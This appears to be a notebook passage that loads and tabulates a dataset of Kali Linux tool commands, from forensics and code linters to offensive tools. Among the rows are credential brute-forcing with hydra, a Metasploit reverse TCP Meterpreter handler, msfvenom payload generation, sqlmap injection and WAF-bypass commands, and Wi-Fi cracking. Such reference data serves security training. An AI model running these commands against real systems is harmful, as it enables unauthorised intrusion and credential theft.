4,hydra,hydra -l admin -P passwords.txt ftp://192.168.1.1,Brute-force FTP credentials using a password l...,Password Cracking,Credential brute-forcing,"[-l, -P]",Linux,https://www.kali.org/tools/hydra/,NaN
5,aircrack-ng,aircrack-ng -w wordlist.txt capture.cap,Crack WEP/WPA keys from captured packets.,Wireless,Wireless network key cracking,[-w],Linux,https://www.aircrack-ng.org/,NaN
6,burpsuite,java -jar burpsuite.jar,Launch Burp Suite for web vulnerability testing.,Web Application,Web application security testing,[],Linux,https://portswigger.net/burp/documentation,NaN
7,wireshark,wireshark -i eth0 -f 'tcp port 80',Capture and analyze TCP traffic on port 80.,Networking,Network traffic analysis,"[-i, -f]",Linux,https://www.wireshark.org/docs/,NaN
8,john,john --wordlist=rockyou.txt hash.txt,Crack password hashes using a wordlist.,Password Cracking,Password hash cracking,[--wordlist],Linux,https://www.openwall.com/john/,NaN
9,hashcat,hashcat -m 0 -a 0 hash.txt wordlist.txt,Crack MD5 hashes using a wordlist.,Password Cracking,High-performance hash cracking,"[-m, -a]",Linux,https://hashcat.net/hashcat/,NaN
10,nikto,nikto -h http://example.com,Scan web server for vulnerabilities and miscon...,Web Application,Web server vulnerability scanning,[-h],Linux,https://cirt.net/Nikto2,NaN
11,dirb,dirb http://example.com wordlist.txt,Brute-force directories and files on a web ser...,Web Application,Directory enumeration,[],Linux,https://www.kali.org/tools/dirb/,NaN
12,sqlmap,sqlmap -u http://example.com --tables,Enumerate tables in a database via SQL injection.,Web Application,SQL injection exploitation,"[-u, --tables]",Linux,http://sqlmap.org/,NaN
13,hydra,hydra -L users.txt -P passwords.txt ssh://192....,Brute-force SSH credentials using user and pas...,Password Cracking,SSH brute-forcing,"[-L, -P]",Linux,https://www.kali.org/tools/hydra/,NaN
14,metasploit,msfconsole -q -x 'use auxiliary/scanner/smb/sm...,Scan for SMB versions on a network range.,Networking,Service enumeration,"[-q, -x]",Linux,https://docs.metasploit.com/,NaN
15,aircrack-ng,airmon-ng start wlan0,Enable monitor mode on a wireless interface.,Wireless,Wireless packet capturing,[start],Linux,https://www.aircrack-ng.org/,NaN
16,nmap,nmap --script http-enum 192.168.1.1,Enumerate web directories and files using Nmap...,Web Application,Web enumeration,[--script],Linux,https://nmap.org/nsedoc/scripts/http-enum.html,NaN
17,wpscan,wpscan --url http://example.com --enumerate u,Enumerate WordPress users.,Web Application,WordPress vulnerability scanning,"[--url, --enumerate]",Linux,https://wpscan.com/wordpress-security-scanner,NaN
18,hydra,hydra -l admin -P passwords.txt http-post-form...,Brute-force HTTP form-based authentication.,Password Cracking,Web form brute-forcing,"[-l, -P]",Linux,https://www.kali.org/tools/hydra/,NaN
19,msfvenom,msfvenom -p windows/meterpreter/reverse_tcp LH...,Generate a reverse TCP Meterpreter payload for...,Exploitation,Payload generation,"[-p, -f, -o]",Linux,https://docs.metasploit.com/docs/using-metaspl...,NaN

### 3. Viewing all tools for a specific category (e.g., 'Forensics')

In [ ]:
# Filter for tools in the 'Forensics' category
forensics_tools = df[df['category'] == 'Forensics']
print("Tools in 'Forensics' category:")
display(forensics_tools)

Tools in 'Forensics' category:

,tool,command,description,category,use_case,flags,os,reference_link,supported_languages
50,autopsy,autopsy -d /case1 -i /dev/sda,Start Autopsy to analyze a disk image for fore...,Forensics,Disk image analysis,"[-d, -i]",Linux,https://www.sleuthkit.org/autopsy/docs.php,NaN
51,foremost,foremost -t all -i image.dd -o output/,Recover files from a disk image based on file ...,Forensics,File recovery,"[-t, -i, -o]",Linux,http://foremost.sourceforge.net/,NaN
52,volatility,volatility -f memory.dump imageinfo,Identify memory image profile for further anal...,Forensics,Memory forensics,[-f],Linux,https://www.volatilityfoundation.org/,NaN
53,binwalk,binwalk -e firmware.bin,Extract embedded files and firmware components.,Forensics,Firmware analysis,[-e],Linux,https://github.com/ReFirmLabs/binwalk,NaN
54,dd,dd if=/dev/sda of=image.dd bs=4M,Create a forensic disk image of a physical drive.,Forensics,Disk imaging,"[if, of, bs]",Linux,https://www.man7.org/linux/man-pages/man1/dd.1...,NaN
55,sleuthkit,tsk_recover -a image.dd output/,Recover deleted files from a disk image.,Forensics,File recovery,[-a],Linux,https://www.sleuthkit.org/sleuthkit/man/tsk_re...,NaN
56,testdisk,testdisk /dev/sda,Recover lost partitions and repair filesystems.,Forensics,Partition recovery,[],Linux,https://www.cgsecurity.org/wiki/TestDisk,NaN
57,photorec,photorec /dev/sda,Recover files from a disk based on file signat...,Forensics,File recovery,[],Linux,https://www.cgsecurity.org/wiki/PhotoRec,NaN
58,volatility,volatility -f memory.dump --profile=Win7SP1x64...,List running processes from a memory dump.,Forensics,Memory forensics,"[-f, --profile]",Linux,https://www.volatilityfoundation.org/,NaN
59,bulk_extractor,bulk_extractor -o output/ image.dd,Extract bulk data like emails and URLs from a ...,Forensics,Data extraction,[-o],Linux,https://github.com/simsong/bulk_extractor,NaN
60,scalpel,scalpel -c scalpel.conf -o output/ image.dd,Carve files from a disk image using a configur...,Forensics,File carving,"[-c, -o]",Linux,https://github.com/sleuthkit/scalpel,NaN
61,guymager,guymager -o /case1/image.dd /dev/sda,Acquire a forensic disk image with a GUI inter...,Forensics,Disk imaging,[-o],Linux,https://guymager.sourceforge.io/,NaN
62,dcfldd,dcfldd if=/dev/sda of=image.dd hash=sha256,Create a disk image with hash verification.,Forensics,Disk imaging,"[if, of, hash]",Linux,http://dcfldd.sourceforge.net/,NaN
63,exiftool,exiftool evidence.jpg,Extract metadata from an image file.,Forensics,Metadata analysis,[],Linux,https://exiftool.org/,NaN
64,strings,strings memory.dump > strings.txt,Extract printable strings from a memory dump.,Forensics,Data extraction,[],Linux,https://www.man7.org/linux/man-pages/man1/stri...,NaN
65,volatility,volatility -f memory.dump --profile=Win7SP1x64...,Analyze network connections in a memory dump.,Forensics,Network forensics,"[-f, --profile]",Linux,https://www.volatilityfoundation.org/,NaN
66,sleuthkit,fls -r image.dd,List files and directories in a disk image.,Forensics,Filesystem analysis,[-r],Linux,https://www.sleuthkit.org/sleuthkit/man/fls.html,NaN
67,binwalk,binwalk --signature firmware.bin,Analyze firmware for embedded signatures.,Forensics,Firmware analysis,[--signature],Linux,https://github.com/ReFirmLabs/binwalk,NaN
68,foremost,foremost -t jpg -i image.dd -o output/,Recover JPEG files from a disk image.,Forensics,File recovery,"[-t, -i, -o]",Linux,http://foremost.sourceforge.net/,NaN
69,autopsy,autopsy -p 8080,Start Autopsy web server for remote case analy...,Forensics,Disk image analysis,[-p],Linux,https://www.sleuthkit.org/autopsy/docs.php,NaN
70,ddrescue,ddrescue -f /dev/sda image.dd logfile,Recover data from a failing disk with error ha...,Forensics,Disk recovery,[-f],Linux,https://www.gnu.org/software/ddrescue/,NaN
71,volatility,volatility -f memory.dump --profile=Win7SP1x64...,Display command-line arguments of processes in...,Forensics,Memory forensics,"[-f, --profile]",Linux,https://www.volatilityfoundation.org/,NaN
72,sleuthkit,mmls image.dd,Display partition table of a disk image.,Forensics,Partition analysis,[],Linux,https://www.sleuthkit.org/sleuthkit/man/mmls.html,NaN
73,testdisk,testdisk /log /dev/sda,Recover partitions with logging enabled.,Forensics,Partition recovery,[/log],Linux,https://www.cgsecurity.org/wiki/TestDisk,NaN
74,photorec,photorec /d output/ /dev/sda,Recover files to a specified output directory.,Forensics,File recovery,[/d],Linux,https://www.cgsecurity.org/wiki/PhotoRec,NaN
75,bulk_extractor,bulk_extractor -E email -o output/ image.dd,Extract email addresses from a disk image.,Forensics,Data extraction,"[-E, -o]",Linux,https://github.com/simsong/bulk_extractor,NaN
76,exiftool,exiftool -csv evidence.jpg > metadata.csv,Export image metadata to a CSV file.,Forensics,Metadata analysis,[-csv],Linux,https://exiftool.org/,NaN
77,dcfldd,dcfldd if=/dev/sda of=image.dd hashlog=hash.txt,Create a disk image with a hash log.,Forensics,Disk imaging,"[if, of, hashlog]",Linux,http://dcfldd.sourceforge.net/,NaN
78,guymager,guymager -c /case1/config.xml,Acquire a disk image using a configuration file.,Forensics,Disk imaging,[-c],Linux,https://guymager.sourceforge.io/,NaN
79,sleuthkit,icat image.dd 12345 > file.txt,Extract a file by inode from a disk image.,Forensics,File extraction,[],Linux,https://www.sleuthkit.org/sleuthkit/man/icat.html,NaN
80,volatility,volatility -f memory.dump --profile=Win7SP1x64...,Dump memory of a specific process.,Forensics,Memory forensics,"[-f, --profile, -p]",Linux,https://www.volatilityfoundation.org/,NaN
81,binwalk,binwalk -M firmware.bin,Perform recursive analysis of firmware.,Forensics,Firmware analysis,[-M],Linux,https://github.com/ReFirmLabs/binwalk,NaN
82,foremost,foremost -t pdf -i image.dd -o output/,Recover PDF files from a disk image.,Forensics,File recovery,"[-t, -i, -o]",Linux,http://foremost.sourceforge.net/,NaN
83,ddrescue,ddrescue -r 3 /dev/sda image.dd logfile,Recover data with multiple retries.,Forensics,Disk recovery,[-r],Linux,https://www.gnu.org/software/ddrescue/,NaN
84,sleuthkit,fsstat image.dd,Display filesystem details of a disk image.,Forensics,Filesystem analysis,[],Linux,https://www.sleuthkit.org/sleuthkit/man/fsstat...,NaN
85,autopsy,autopsy -c /case1/case.aut,Open an existing Autopsy case file.,Forensics,Disk image analysis,[-c],Linux,https://www.sleuthkit.org/autopsy/docs.php,NaN
86,exiftool,exiftool -a -u evidence.pdf,"Extract all metadata, including unknown tags, ...",Forensics,Metadata analysis,"[-a, -u]",Linux,https://exiftool.org/,NaN
87,volatility,volatility -f memory.dump --profile=Win7SP1x64...,List registry hives in a memory dump.,Forensics,Memory forensics,"[-f, --profile]",Linux,https://www.volatilityfoundation.org/,NaN
88,bulk_extractor,bulk_extractor -E url -o output/ image.dd,Extract URLs from a disk image.,Forensics,Data extraction,"[-E, -o]",Linux,https://github.com/simsong/bulk_extractor,NaN
89,scalpel,scalpel -b -o output/ image.dd,Carve files without headers from a disk image.,Forensics,File carving,"[-b, -o]",Linux,https://github.com/sleuthkit/scalpel,NaN
90,testdisk,testdisk /dev/sda /analyse,Analyze disk for partition recovery.,Forensics,Partition recovery,[/analyse],Linux,https://www.cgsecurity.org/wiki/TestDisk,NaN
91,photorec,photorec /log /d output/ /dev/sda,Recover files with logging enabled.,Forensics,File recovery,"[/log, /d]",Linux,https://www.cgsecurity.org/wiki/PhotoRec,NaN
92,dcfldd,dcfldd if=/dev/sda of=image.dd status=on,Create a disk image with progress status.,Forensics,Disk imaging,"[if, of, status]",Linux,http://dcfldd.sourceforge.net/,NaN
93,guymager,guymager -l logfile /dev/sda,Acquire a disk image with logging.,Forensics,Disk imaging,[-l],Linux,https://guymager.sourceforge.io/,NaN
94,sleuthkit,blkls image.dd > slack_space.dat,Extract slack space from a disk image.,Forensics,Slack space analysis,[],Linux,https://www.sleuthkit.org/sleuthkit/man/blkls....,NaN
95,volatility,volatility -f memory.dump --profile=Win7SP1x64...,Scan for file objects in a memory dump.,Forensics,Memory forensics,"[-f, --profile]",Linux,https://www.volatilityfoundation.org/,NaN
96,binwalk,binwalk -y filesystem firmware.bin,Extract filesystem from firmware.,Forensics,Firmware analysis,[-y],Linux,https://github.com/ReFirmLabs/binwalk,NaN
97,foremost,foremost -t docx -i image.dd -o output/,Recover DOCX files from a disk image.,Forensics,File recovery,"[-t, -i, -o]",Linux,http://foremost.sourceforge.net/,NaN
98,ddrescue,ddrescue -n /dev/sda image.dd logfile,Recover data without retrying bad sectors.,Forensics,Disk recovery,[-n],Linux,https://www.gnu.org/software/ddrescue/,NaN
99,exiftool,exiftool -json evidence.jpg > metadata.json,Export image metadata to a JSON file.,Forensics,Metadata analysis,[-json],Linux,https://exiftool.org/,NaN

### 4. Iterating & displaying tools + Output to CSV!!

This will give you a complete, organized list of all tools, grouped by their category. We'll also sort the categories and tools alphabetically for better readability.

In [ ]:
# Sort the DataFrame by 'category' and then by 'tool' name
sorted_df = df.sort_values(by=['category', 'tool']).reset_index(drop=True)

# Define columns to drop (excluding 'category' this time)
columns_to_drop = ['os', 'supported_languages']

# Create the final DataFrame with desired columns
# The 'category' column will remain as it's not in columns_to_drop
final_display_df = sorted_df.drop(columns=columns_to_drop, errors='ignore')

print("\n--- Kali-Linux Tools Dataset (Organized) ---")
# Display the entire organized DataFrame as an interactive table
display(final_display_df)

# Save the organized DataFrame to a CSV file
output_csv_path = 'kali_linux_tools_organized.csv'
final_display_df.to_csv(output_csv_path, index=False)
print(f"\nOutput saved to '{output_csv_path}'")

--- Kali-Linux Tools Dataset (Organized) ---

,tool,command,description,category,use_case,flags,reference_link
0,AddressSanitizer,gcc -fsanitize=address -g program.c,Compile C code with memory error detection.,Code Analysis,Memory analysis,"[-fsanitize=address, -g]",https://clang.llvm.org/docs/AddressSanitizer.html
1,Bandit,bandit -r src,Scan Python code for security vulnerabilities.,Code Analysis,Security analysis,[-r],https://bandit.readthedocs.io/
2,Checkstyle,checkstyle -c sun_checks.xml Main.java,Enforce Java coding standards.,Code Analysis,Code style,[-c],https://checkstyle.sourceforge.io/
3,Clang,clang --analyze main.c,Static analysis for C/C++ code.,Code Analysis,Static analysis,[--analyze],https://clang.llvm.org/docs/ClangStaticAnalyze...
4,Clazy,clazy main.cpp,Qt-oriented static analysis for C++.,Code Analysis,Static analysis,[],https://github.com/KDE/clazy
...,...,...,...,...,...,...,...
785,wifite,wifite --cracked,Show previously cracked networks.,Wireless Attacks,Attack history,[--cracked],https://github.com/derv82/wifite2
786,wifite,wifite --dict wordlist.txt -i wlan0,Use custom wordlist for cracking.,Wireless Attacks,Password cracking,"[--dict, -i]",https://github.com/derv82/wifite2
787,wifite,wifite --pmkid -i wlan0,Capture PMKID for WPA attack.,Wireless Attacks,PMKID attack,"[--pmkid, -i]",https://github.com/derv82/wifite2
788,wifite,wifite --kill -i wlan0,Kill conflicting processes before attack.,Wireless Attacks,Automated Wi-Fi attack,"[--kill, -i]",https://github.com/derv82/wifite2
789,wifite,wifite --wps -i wlan0,Target WPS-enabled networks.,Wireless Attacks,WPS attack,"[--wps, -i]",https://github.com/derv82/wifite2

Output saved to 'kali_linux_tools_organized.csv'

In [ ]:
    # Drop the unwanted columns before displaying
    columns_to_drop = ['category', 'os', 'supported_languages']
    display_df = category_tools.drop(columns=columns_to_drop, errors='ignore')

    # Display the filtered DataFrame
    display(display_df)

## **Using Python To Organize The Data:**

In [ ]:
import json

# The file path is stored in the 'path' variable from the previous step
file_path = f'{path}/KALI_LINUX_TOOLS_DATASET.jsonl'

# Initialize an empty list to store the parsed JSON objects
json_data = []

# Read the .jsonl file line by line and parse each JSON object
with open(file_path, 'r') as f:
    for line in f:
        json_data.append(json.loads(line))

print(f"Loaded {len(json_data)} entries.")
print("\nFirst 3 parsed entries (Python dictionaries):")
# Display the first few entries from the list
for i, entry in enumerate(json_data[:3]):
    print(f"Entry {i+1}:")
    for key, value in entry.items():
        print(f"  {key}: {value}")
    print("\n")

Loaded 790 entries.

First 3 parsed entries (Python dictionaries):
Entry 1:
  tool: nmap
  command: nmap -sV -p 1-65535 192.168.1.1
  description: Scan all TCP ports and detect service versions on a target host.
  category: Networking
  use_case: Port scanning and service detection
  flags: ['-sV', '-p']
  os: Linux
  reference_link: https://nmap.org/book/man-briefoptions.html


Entry 2:
  tool: nmap
  command: nmap -sS -O 192.168.1.1
  description: Perform a stealth SYN scan and OS detection.
  category: Networking
  use_case: Stealth scanning and OS fingerprinting
  flags: ['-sS', '-O']
  os: Linux
  reference_link: https://nmap.org/book/man-briefoptions.html


Entry 3:
  tool: metasploit
  command: msfconsole -q -x 'use exploit/multi/handler; set PAYLOAD windows/meterpreter/reverse_tcp; set LHOST 192.168.1.100; run'
  description: Set up a reverse TCP handler for incoming connections.
  category: Exploitation
  use_case: Exploit handling and payload delivery
  flags: ['-q', '-x']
  os: Linux
  reference_link: https://docs.metasploit.com/

You can then query this `json_data` list using list comprehensions or loops. For example, to find all tools in the 'Web Application' category:

In [ ]:
web_app_tools_list = [tool for tool in json_data if tool['category'] == 'Web Application']

print(f"Found {len(web_app_tools_list)} web application tools (first 2 entries):\n")
for i, tool in enumerate(web_app_tools_list[:2]):
    print(f"Tool {i+1}:")
    for key, value in tool.items():
        print(f"  {key}: {value}")
    print("\n")

Found 86 web application tools (first 2 entries):

Tool 1:
  tool: sqlmap
  command: sqlmap -u http://example.com --dbs
  description: Enumerate databases on a vulnerable web application.
  category: Web Application
  use_case: SQL injection testing
  flags: ['-u', '--dbs']
  os: Linux
  reference_link: http://sqlmap.org/


Tool 2:
  tool: burpsuite
  command: java -jar burpsuite.jar
  description: Launch Burp Suite for web vulnerability testing.
  category: Web Application
  use_case: Web application security testing
  flags: []
  os: Linux
  reference_link: https://portswigger.net/burp/documentation

## Using `google.colab.data_table`

Run this cell first to enable the interactive tables for all subsequent DataFrame displays. Once enabled, any `display(df)` or `df` as the last line of a cell will render as an interactive table.

In [ ]:
from google.colab import data_table
data_table.enable_dataframe_formatter()

#### Display the entire DataFrame `df` as an interactive table

Now, let's display the full `df`. You'll notice it's now an interactive table where you can sort columns, filter rows, and navigate pages.

In [ ]:
print("Full dataset as an interactive table:")
display(df)

Full dataset as an interactive table:

,tool,command,description,category,use_case,flags,os,reference_link,supported_languages
0,nmap,nmap -sV -p 1-65535 192.168.1.1,Scan all TCP ports and detect service versions...,Networking,Port scanning and service detection,"[-sV, -p]",Linux,https://nmap.org/book/man-briefoptions.html,NaN
1,nmap,nmap -sS -O 192.168.1.1,Perform a stealth SYN scan and OS detection.,Networking,Stealth scanning and OS fingerprinting,"[-sS, -O]",Linux,https://nmap.org/book/man-briefoptions.html,NaN
2,metasploit,msfconsole -q -x 'use exploit/multi/handler; s...,Set up a reverse TCP handler for incoming conn...,Exploitation,Exploit handling and payload delivery,"[-q, -x]",Linux,https://docs.metasploit.com/,NaN
3,sqlmap,sqlmap -u http://example.com --dbs,Enumerate databases on a vulnerable web applic...,Web Application,SQL injection testing,"[-u, --dbs]",Linux,http://sqlmap.org/,NaN
4,hydra,hydra -l admin -P passwords.txt ftp://192.168.1.1,Brute-force FTP credentials using a password l...,Password Cracking,Credential brute-forcing,"[-l, -P]",Linux,https://www.kali.org/tools/hydra/,NaN
...,...,...,...,...,...,...,...,...,...
785,faraday,faraday-cli export --format txt --output repor...,Export Faraday data to text.,Reporting,Report export,"[--format, --output]",Linux,https://faradaysec.com/documentation/,NaN
786,pandoc,pandoc report.md -s -o report.html,Convert Markdown to standalone HTML.,Reporting,Format conversion,"[-s, -o]",Linux,https://pandoc.org/MANUAL.html,NaN
787,metagoofil,metagoofil -d example.com -t all -o report.json,Generate JSON report of all metadata findings.,Reporting,Metadata reporting,"[-d, -t, -o]",Linux,https://github.com/laramies/metagoofil,NaN
788,nmap,nmap -oX scan.xml -T4 192.168.1.100,Export Nmap results to XML with aggressive tim...,Reporting,Scan reporting,"[-oX, -T4]",Linux,https://nmap.org/book/man.html,NaN
789,metasploit,msfconsole -x 'report -t executive -o exec_rep...,Generate an executive PDF report.,Reporting,Report generation,"[-x, -t, -o]",Linux,https://docs.metasploit.com/,NaN

#### Display categorized tools with `data_table`

The categorized output we generated earlier will also benefit from `data_table`. The `display_df` for each category will now be an interactive table, making it much easier to explore the tools within each group.

In [ ]:
# @title Kali-Linux Tools Dataset
# Sort the DataFrame first by 'category' and then by 'tool' name
sorted_df = df.sort_values(by=['category', 'tool']).reset_index(drop=True)

# Get all unique categories, sorted alphabetically
sorted_categories = sorted(df['category'].unique())

for category in sorted_categories:
    print(f"\n--- Category: {category} ---")
    category_tools = sorted_df[sorted_df['category'] == category]

    # Drop the unwanted columns before displaying
    columns_to_drop = ['category', 'os', 'supported_languages']
    display_df = category_tools.drop(columns=columns_to_drop, errors='ignore')

    # Display the filtered DataFrame as an interactive table
    display(display_df)

--- Category: Code Analysis ---

,tool,command,description,use_case,flags,reference_link
0,AddressSanitizer,gcc -fsanitize=address -g program.c,Compile C code with memory error detection.,Memory analysis,"[-fsanitize=address, -g]",https://clang.llvm.org/docs/AddressSanitizer.html
1,Bandit,bandit -r src,Scan Python code for security vulnerabilities.,Security analysis,[-r],https://bandit.readthedocs.io/
2,Checkstyle,checkstyle -c sun_checks.xml Main.java,Enforce Java coding standards.,Code style,[-c],https://checkstyle.sourceforge.io/
3,Clang,clang --analyze main.c,Static analysis for C/C++ code.,Static analysis,[--analyze],https://clang.llvm.org/docs/ClangStaticAnalyze...
4,Clazy,clazy main.cpp,Qt-oriented static analysis for C++.,Static analysis,[],https://github.com/KDE/clazy
5,Codacy,codacy-analysis-cli analyze,Run Codacy CLI for automated code review.,Code quality,[analyze],https://docs.codacy.com/
6,CodeScene,codescene analyze,Behavioral code analysis for quality.,Code quality,[analyze],https://codescene.io/docs/
7,CodeSonar,codesonar analyze project,Deep static analysis for multiple languages.,Static analysis,[analyze],https://www.grammatech.com/products/codesonar
8,Coverity,cov-analyze --dir cov-int,Analyze code for defects and vulnerabilities.,Static analysis,[--dir],https://www.synopsys.com/software-integrity/co...
9,Cppcheck,cppcheck --enable=all main.c,Static analysis for C/C++ code.,Static analysis,[--enable],http://cppcheck.sourceforge.net/
10,Cpplint,cpplint main.cpp,Check C++ code against Google style guide.,Code style,[],https://github.com/cpplint/cpplint
11,DeepSource,deepsource analyze,Analyze code for quality and security issues.,Code quality,[analyze],https://deepsource.io/docs/
12,Dlint,dlint module.py,Check Python code for security issues.,Security analysis,[],https://github.com/dlint-py/dlint
13,ESLint,eslint .,Lint JavaScript files in current directory.,Code linting,[],https://eslint.org/docs/
14,Embold,embold analyze --dir src,Code analytics for quality and defects.,Code quality,[--dir],https://embold.io/
15,ErrorProne,javac -Xplugin:ErrorProne Main.java,Detect common Java errors during compilation.,Bug detection,[-Xplugin],https://errorprone.info/
16,FindBugs,findbugs -textui -effort:max Main.class,Detect bugs in Java bytecode.,Bug detection,"[-textui, -effort]",http://findbugs.sourceforge.net/
17,Flake8,flake8 module.py,Check Python code for style and errors.,Code linting,[],https://flake8.pycqa.org/
18,Fortify,sourceanalyzer -b project -scan,Scan code for security vulnerabilities.,Security analysis,"[-b, -scan]",https://www.microfocus.com/en-us/products/fort...
19,Frama-C,frama-c -val main.c,Formal analysis for C code.,Static analysis,[-val],https://frama-c.com/
20,GolangCI-Lint,golangci-lint run,Lint Go code for issues and bugs.,Code linting,[run],https://golangci-lint.run/
21,Hadolint,hadolint Dockerfile,Lint Dockerfile for best practices.,Code linting,[],https://github.com/hadolint/hadolint
22,Infer,infer run -- make,Static analysis for C/C++/Java code.,Static analysis,[run],https://fbinfer.com/docs/
23,JSHint,jshint script.js,Lint JavaScript code for errors.,Code linting,[],https://jshint.com/docs/
24,JSLint,jslint script.js,Strict JavaScript code quality check.,Code linting,[],https://www.jslint.com/
25,Kiuwan,kiuwan analyze,Static analysis for code quality and security.,Code quality,[analyze],https://www.kiuwan.com/docs/
26,Klocwork,kwinject make,Static analysis for C/C++/Java code.,Static analysis,[],https://www.perforce.com/products/klocwork
27,PHPStan,phpstan analyze src,Static analysis for PHP code.,Static analysis,[analyze],https://phpstan.org/
28,PMD,pmd check -d src -R rulesets/java/quickstart.xml,Analyze Java code for bugs and style issues.,Static analysis,"[-d, -R]",https://pmd.github.io/
29,PVS-Studio,pvs-studio --source-file main.c --output-file ...,Detect bugs in C/C++ code.,Bug detection,"[--source-file, --output-file]",https://pvs-studio.com/
30,PerlCritic,perlcritic script.pl,Enforce Perl coding best practices.,Code linting,[],https://metacpan.org/pod/Perl::Critic
31,Perltidy,perltidy script.pl,Format and check Perl code.,Code style,[],http://perltidy.sourceforge.net/
32,Psalm,psalm --report=report.json,Static analysis for PHP with type checking.,Static analysis,[--report],https://psalm.dev/
33,PyCharm,pycharm --inspect module.py,Run PyCharm code inspection for Python.,Code linting,[--inspect],https://www.jetbrains.com/pycharm/
34,Pylint,pylint module.py,Analyze Python code for errors and style issues.,Code linting,[],https://pylint.pycqa.org/
35,Qodana,qodana scan,Static analysis for multiple languages.,Static analysis,[scan],https://www.jetbrains.com/qodana/
36,RIPS,rips-cli scan --dir src,Security analysis for PHP code.,Security analysis,"[scan, --dir]",https://www.ripstech.com/
37,ReSharper,resharper inspectcode solution.sln,Analyze C# code for quality issues.,Code quality,[inspectcode],https://www.jetbrains.com/resharper/
38,RuboCop,rubocop -a,Lint and auto-correct Ruby code.,Code linting,[-a],https://docs.rubocop.org/
39,Semgrep,semgrep --config p/r2c-ci scan,Scan code for security vulnerabilities.,Security analysis,[--config],https://semgrep.dev/docs/
40,Snyk,snyk code test,Scan code for security issues.,Security analysis,"[code, test]",https://snyk.io/product/snyk-code/
41,SonarLint,sonarlint --src main.py,Real-time linting in IDE for Python code.,Code linting,[--src],https://www.sonarsource.com/products/sonarlint/
42,SonarQube,sonar-scanner,Run SonarQube scanner for code quality analysis.,Code quality,[],https://docs.sonarqube.org/
43,Sourcetrail,sourcetrail --project-file project.srctrl,Visualize and analyze C/C++/Java code.,Code visualization,[--project-file],https://github.com/CoatiSoftware/Sourcetrail
44,Splint,splint main.c,Static analysis for C code security.,Security analysis,[],http://splint.org/
45,Stylelint,stylelint 'src/**/*.css',Lint CSS/SCSS code for style issues.,Code linting,[],https://stylelint.io/
46,TSLint,tslint -c tslint.json 'src/**/*.ts',Lint TypeScript code for errors.,Code linting,[-c],https://palantir.github.io/tslint/
47,Teamscale,teamscale analyze --project myproject,Monitor code quality across languages.,Code quality,[--project],https://www.cqse.eu/en/products/teamscale/
48,Valgrind,valgrind --tool=memcheck ./program,Detect memory leaks in C/C++ programs.,Memory analysis,[--tool],https://valgrind.org/docs/
49,Veracode,veracode scan --file app.jar,Scan Java code for vulnerabilities.,Security analysis,[--file],https://www.veracode.com/products/static-analysis

--- Category: Exploitation ---

,tool,command,description,use_case,flags,reference_link
50,burpsuite,burpsuite,Launch Burp Suite for web vulnerability testing.,Web application testing,[],https://portswigger.net/burp/documentation
51,burpsuite,burpsuite --proxy,Start Burp Suite proxy for intercepting traffic.,Traffic interception,[--proxy],https://portswigger.net/burp/documentation
52,burpsuite,burpsuite --scanner,Run Burp Suite scanner for vulnerabilities.,Vulnerability scanning,[--scanner],https://portswigger.net/burp/documentation
53,burpsuite,burpsuite --repeater,Use Burp Suite repeater for manual testing.,Manual exploitation,[--repeater],https://portswigger.net/burp/documentation
54,burpsuite,burpsuite --intruder,Use Burp Suite intruder for automated attacks.,Automated exploitation,[--intruder],https://portswigger.net/burp/documentation
...,...,...,...,...,...,...
124,sqlmap,sqlmap -u http://example.com --file-write=/tmp...,Write a file via SQL injection.,File access,"[-u, --file-write]",http://sqlmap.org/
125,sqlmap,sqlmap -u http://example.com --tamper=space2co...,Use tamper script to bypass WAF.,SQL injection,"[-u, --tamper]",http://sqlmap.org/
126,sqlmap,sqlmap -u http://example.com --batch,Run SQL injection in non-interactive mode.,SQL injection,"[-u, --batch]",http://sqlmap.org/
127,sqlmap,sqlmap -u http://example.com --cookie='id=1',Perform SQL injection with a cookie.,SQL injection,"[-u, --cookie]",http://sqlmap.org/
128,sqlmap,sqlmap -u http://example.com --dbms=mysql,Target MySQL for SQL injection.,SQL injection,"[-u, --dbms]",http://sqlmap.org/

--- Category: Forensics ---

,tool,command,description,use_case,flags,reference_link
129,autopsy,autopsy -d /case1 -i /dev/sda,Start Autopsy to analyze a disk image for fore...,Disk image analysis,"[-d, -i]",https://www.sleuthkit.org/autopsy/docs.php
130,autopsy,autopsy -p 8080,Start Autopsy web server for remote case analy...,Disk image analysis,[-p],https://www.sleuthkit.org/autopsy/docs.php
131,autopsy,autopsy -c /case1/case.aut,Open an existing Autopsy case file.,Disk image analysis,[-c],https://www.sleuthkit.org/autopsy/docs.php
132,binwalk,binwalk -e firmware.bin,Extract embedded files and firmware components.,Firmware analysis,[-e],https://github.com/ReFirmLabs/binwalk
133,binwalk,binwalk --signature firmware.bin,Analyze firmware for embedded signatures.,Firmware analysis,[--signature],https://github.com/ReFirmLabs/binwalk
134,binwalk,binwalk -M firmware.bin,Perform recursive analysis of firmware.,Firmware analysis,[-M],https://github.com/ReFirmLabs/binwalk
135,binwalk,binwalk -y filesystem firmware.bin,Extract filesystem from firmware.,Firmware analysis,[-y],https://github.com/ReFirmLabs/binwalk
136,bulk_extractor,bulk_extractor -o output/ image.dd,Extract bulk data like emails and URLs from a ...,Data extraction,[-o],https://github.com/simsong/bulk_extractor
137,bulk_extractor,bulk_extractor -E email -o output/ image.dd,Extract email addresses from a disk image.,Data extraction,"[-E, -o]",https://github.com/simsong/bulk_extractor
138,bulk_extractor,bulk_extractor -E url -o output/ image.dd,Extract URLs from a disk image.,Data extraction,"[-E, -o]",https://github.com/simsong/bulk_extractor
139,dcfldd,dcfldd if=/dev/sda of=image.dd hash=sha256,Create a disk image with hash verification.,Disk imaging,"[if, of, hash]",http://dcfldd.sourceforge.net/
140,dcfldd,dcfldd if=/dev/sda of=image.dd hashlog=hash.txt,Create a disk image with a hash log.,Disk imaging,"[if, of, hashlog]",http://dcfldd.sourceforge.net/
141,dcfldd,dcfldd if=/dev/sda of=image.dd status=on,Create a disk image with progress status.,Disk imaging,"[if, of, status]",http://dcfldd.sourceforge.net/
142,dd,dd if=/dev/sda of=image.dd bs=4M,Create a forensic disk image of a physical drive.,Disk imaging,"[if, of, bs]",https://www.man7.org/linux/man-pages/man1/dd.1...
143,ddrescue,ddrescue -f /dev/sda image.dd logfile,Recover data from a failing disk with error ha...,Disk recovery,[-f],https://www.gnu.org/software/ddrescue/
144,ddrescue,ddrescue -r 3 /dev/sda image.dd logfile,Recover data with multiple retries.,Disk recovery,[-r],https://www.gnu.org/software/ddrescue/
145,ddrescue,ddrescue -n /dev/sda image.dd logfile,Recover data without retrying bad sectors.,Disk recovery,[-n],https://www.gnu.org/software/ddrescue/
146,exiftool,exiftool evidence.jpg,Extract metadata from an image file.,Metadata analysis,[],https://exiftool.org/
